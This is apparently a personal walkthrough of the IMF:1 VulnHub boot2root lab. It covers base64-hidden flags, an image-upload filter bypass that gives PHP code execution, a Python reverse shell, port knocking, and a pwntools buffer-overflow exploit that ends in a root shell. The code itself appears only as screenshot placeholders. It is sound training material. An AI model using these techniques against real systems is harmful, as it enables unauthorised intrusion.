IMF: 1

[ vulnhub  boot2root  walkthrough  ]

Goal

6 flags in flag{base64hash} format
root

Download

https://www.vulnhub.com/entry/imf-1,162/

Walkthrough

nmap
alt text

default 80
alt text

flag 1 found in source
alt text

flag 1 decoded gives hint to look at all the files
alt text

looking further at source the js files look like base64
alt text

putting together and decoding gives flag 2 and next hint looks like a directory
alt text

hint from flag 2 gives login page
alt text

source hints to sqli…yeah i wasn’t able to get it
alt text

went to gobuster and dirb after failing at sqli
alt text
alt text

image found contains qr code
alt text

flag 4 found and gives php upload file name
alt text
alt text

using found uploader, a test upload of jpg is successful
alt text

we know from gobuster of uploads/image directories but file isn’t there
looking at source after upload there is a hash commented out
alt text

hash plus file ext we find our uploaded image
alt text

trying to upload a php file fails
alt text

adding .jpg to .php file fails due to signature checks
alt text
alt text

also find there are file size restrictions, but gifs work
alt text
alt text

after much searching it came to a combination of things to overcome the upload restrictions
file restrictions using GIF89a; as found in this post worked
after so many php oneliner restrictions, using backticks as shown here worked
alt text

uploading and calling the above gif/code gives code execution
alt text

modifying code, uploading and calling again gives flag 5
alt text

next hint seems like something running on the system so we need a shell
alt text

since flag 3 was missed, we modify our code to look at file listings and cat out the index.php
whatever lolz
alt text

alt text

alt text

now for reverse shell, we know there are a bunch of restrictions around php oneliners
so maybe python? initial call didn’t work so we look at an all file list
specifically under /usr/bin and we find python3
alt text

this is our code to get a shell
alt text

finally, but we’re just getting started
alt text

from hint we look at /etc/services and find it’s running on 7788/tcp
alt text

also did find for agent
alt text

running agent looks to be what were looking for
alt text

directory contains two files
alt text

we know the binary asks for an ID and using strings we see a string compare
alt text

forgot we were on a remote system and started examining file…ltrace was installed and code found :)
alt text

code works and im assuming a buffer overflow
alt text

after some time we find option 3, submit report is vulnerable
alt text

so now what? remembered that this isn’t only a binary, but it’s running on port 7788
only port 80 is open though
alt text

insert lots of wasted time x1000

finally noticed that knockd is running and remembered the access_codes file
alt text

i know of port knocking, but not very familiar…off to google

found good digital ocean post of what i needed todo
alt text

followed instructions and modified a bit
alt text

and it worked
alt text

so now we have to work on the exploit on our local machine
simple copy over to the web directory and a wget
alt text
alt text

now onto the binary

start by creating pattern of 200
alt text

examined in gdb
alt text

find the offset of 168
alt text

then test offset in gdb and it’s correct
also find that the overflow is in eax so we find our jmp or call rather to this register
alt text

started to play around with pwntools lately and created a skeleton exploit script
referenced the documentation and this post heavily
alt text

test out the skeleton code, seems to work
alt text

we know we need a reverse shell so we create using msfvenom
after some back and forth i find \x0a is also bad char
alt text

update the payload of our script
alt text

do an initial test and it works; so we remove the interactive stance from our script
alt text

we then setup a local listener and test again…BOOM
alt text

with that working we run script against remote system and we have a reverse shell as root
alt text

flag 6 found and decoded
alt text
alt text

the end
alt text

Written on December 1, 2018
Share on: